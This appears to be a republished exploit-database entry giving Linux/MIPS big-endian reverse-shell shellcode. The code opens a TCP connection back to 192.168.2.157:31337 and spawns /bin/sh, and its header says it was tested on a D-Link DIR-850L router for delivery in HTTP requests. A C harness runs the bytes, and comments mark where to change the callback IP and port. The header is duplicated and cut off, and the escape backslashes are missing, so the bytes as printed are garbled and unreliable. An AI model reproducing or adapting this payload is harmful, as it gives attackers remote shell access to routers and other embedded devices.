Linux MIPS Big Endian execve bin sh Reverse TCP 192.168.2.157 31337 Shellcode

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 745

/*
# Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)
# Author: cq674350529
# Date: 2018-10-07
# - execve('/bin/sh' /*
# Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)
# Author: cq674350529
# Date: 2018-10-07
# - execve('/bin/sh'), tcp - 192.168.2.157/31337
# - used in HTTP Request
# - tested on D-Link dir-850l router, avoid bad chars ('x00', 'x20', 'x23', 'x0dx0a')
# - based on rigan's shellcode and metasploit's shellcode, no encoder used
*/

#include <stdio.h>

unsigned char sc[] =
"x24x0fxffxfa" // li $t7, -6
"x01xe0x78x27" // nor $t7, $zero
"x21xe4xffxfd" // addi $a0, $t7, -3
"x21xe5xffxfd" // addi $a1, $t7, -3
"x28x06xffxff" // slti $a2, $zero, -1
"x24x02x10x57" // li $v0, 4183 ( sys_socket )
"x01x01x01x0c" // syscall 0x40404
"xafxa2xffxff" // sw $v0, -1($sp)
"x8fxa4xffxff" // lw $a0, -1($sp)
"x34x0fxffxfd" // li $t7, -3 ( sa_family = AF_INET )
"x01xe0x78x27" // nor $t7, $zero
"xafxafxffxe0" // sw $t7, -0x20($sp)

/* ================ You can change port here ================= */
"x3cx0ex7ax69" // lui $t6, 0x7a69 ( sin_port = 0x7a69 )
/* ============================================================ */

"x35xcex7ax69" // ori $t6, $t6, 0x7a69
"xafxaexffxe4" // sw $t6, -0x1c($sp)

/* ================ You can change ip here ================= */
"x3cx0exc0xa8" // lui $t6, 0xc0a8 ( sin_addr = 0xc0a8 ...
"x35xcex02x9d" // ori $t6, $t6, 0x029d ... 0x029d
/* ============================================================ */

"xafxaexffxe6" // sw $t6, -0x1a($sp)
"x27xa5xffxe2" // addiu $a1, $sp, -0x1e
"x24x0cxffxef" // li $t4, -17 ( addrlen = 16 )
"x01x80x30x27" // nor $a2, $t4, $zero
"x24x02x10x4a" // li $v0, 4170 ( sys_connect )
"x01x01x01x0c" // syscall 0x40404
"x24x0fxffxfd" // li t7,-3
"x01xe0x28x27" // nor a1,t7,zero
"x8fxa4xffxff" // lw $a0, -1($sp)
// dup2_loop:
"x24x02x0fxdf" // li $v0, 4063 ( sys_dup2 )
"x01x01x01x0c" // syscall 0x40404
"x24xa5xffxff" // addi a1,a1,-1 (x20xa5xffxff)
"x24x01xffxff" // li at,-1
"x14xa1xffxfb" // bne a1,at, dup2_loop
"x28x06xffxff" // slti $a2, $zero, -1
"x3cx0fx2fx2f" // lui $t7, 0x2f2f
"x35xefx62x69" // ori $t7, $t7, 0x6269
"xafxafxffxec" // sw $t7, -0x14($sp)
"x3cx0ex6ex2f" // lui $t6, 0x6e2f
"x35xcex73x68" // ori $t6, $t6, 0x7368
"xafxaexffxf0" // sw $t6, -0x10($sp)
"xafxa0xffxf4" // sw $zero, -0xc($sp)
"x27xa4xffxec" // addiu $a0, $sp, -0x14
"xafxa4xffxf8" // sw $a0, -8($sp)
"xafxa0xffxfc" // sw $zero, -4($sp)
"x27xa5xffxf8" // addiu $a1, $sp, -8
"x24x02x0fxab" // li $v0, 4011 (sys_execve)
"x01x01x01x0c"; // syscall 0x40404

void main(void)
{
void(*s)(void);
printf("size: %d ", sizeof(sc));
s = sc;
s();
}